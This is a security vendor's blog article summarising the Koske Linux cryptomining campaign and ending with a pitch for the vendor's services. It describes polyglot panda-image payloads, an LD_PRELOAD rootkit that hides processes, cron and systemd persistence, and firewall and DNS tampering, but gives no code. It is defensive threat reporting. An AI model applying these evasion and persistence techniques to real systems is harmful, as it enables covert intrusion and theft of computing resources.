A new threat targeting Linux systems has emerged: Koske malware. This advanced malware campaign uses JPEG images of panda bears to trick systems into executing hidden malicious code. Researchers believe Koske was developed using artificial intelligence tools like large language models, enabling it to operate with stealth, adaptability, and automation. In this article, we explore how Koske operates, what makes it unique, and why it represents a new generation of AI-assisted malware.
How Koske Gains Access
The initial infection vector leverages exposed or misconfigured JupyterLab instances. Attackers exploit these instances to execute arbitrary commands on the target system. Once they gain access, they download two panda-themed image files hosted on legitimate services such as OVH, freeimage, or postimage. These images appear harmless to users but contain embedded malicious code.
Polyglot Files, Not Steganography
Unlike typical image-based malware that uses steganography, Koske relies on polyglot files. These are files valid in more than one format simultaneously. In this case, the same file can function both as a JPEG image and a shell script or C source code, depending on how it’s read.
When opened in a viewer, the file displays a normal image of a panda. But when processed by a script interpreter, the hidden code inside the file is executed, allowing malware to run without any obvious visual indication.
Dual Payload Strategy
Each panda image carries one of two payloads, both launched in parallel:
-
A C-based rootkit written into memory, compiled, and executed as a shared object (
.so) file. -
A shell script also executed directly from memory using native Linux utilities.
This combination ensures that the malware can persist on the system, evade detection, and maintain continuous control.
Rootkit Capabilities
The in-memory rootkit is designed to remain hidden. It uses the LD_PRELOAD technique to override the readdir() function, masking processes, files, and directories that contain certain keywords like koske or hideproc. It can also pull hidden process IDs from a specific memory location (/dev/shm/.hiddenpid) to exclude them from user-space monitoring tools.
Persistence and Evasion Tactics
The shell script establishes persistence through cron jobs that run every 30 minutes and custom systemd services. It also modifies system configurations to evade network monitoring:
-
Overwrites
/etc/resolv.confwith Cloudflare and Google DNS -
Locks the file with
chattr +ito prevent changes -
Flushes
iptablesfirewall rules -
Resets system proxy variables
-
Brute-forces working proxy servers using
curl,wget, and direct TCP checks
These measures make it difficult for defenders to identify or interrupt the malware’s activity.
Cryptomining With Intelligence
Once the malware is in place, it evaluates the system’s CPU and GPU performance to choose the most efficient miner from a list. It then downloads the appropriate cryptominer from a GitHub repository. Koske supports mining 18 different cryptocurrencies, including privacy-focused coins like Monero, Ravencoin, Zano, Nexa, and Tari.
If a coin or mining pool becomes unavailable, the malware automatically switches to another from its internal list. This level of automation indicates a high degree of adaptability, reinforcing suspicions that the malware was designed using AI tools or automated frameworks.
Why Koske Represents a New Threat Era
Koske combines stealth, adaptability, and resilience in a way that suggests future threats will be even harder to detect and neutralize. Its use of memory-based execution, polyglot files, and real-time decision-making to maintain its mining operations marks a shift in how malware is built and deployed.
As attackers increasingly integrate artificial intelligence into their toolkits, organizations must evolve their defenses. This includes proactive monitoring, anomaly detection, and continuous threat intelligence.
Protect Your Systems from Emerging Threats
Cybersecurity threats like Koske demand robust and adaptive defenses. At ZENDATA, our cybersecurity services are designed to detect, prevent, and respond to sophisticated malware threats. From memory-based payloads to cryptominer detection, we help businesses stay one step ahead.
Read the full article of BleepingComputer here.
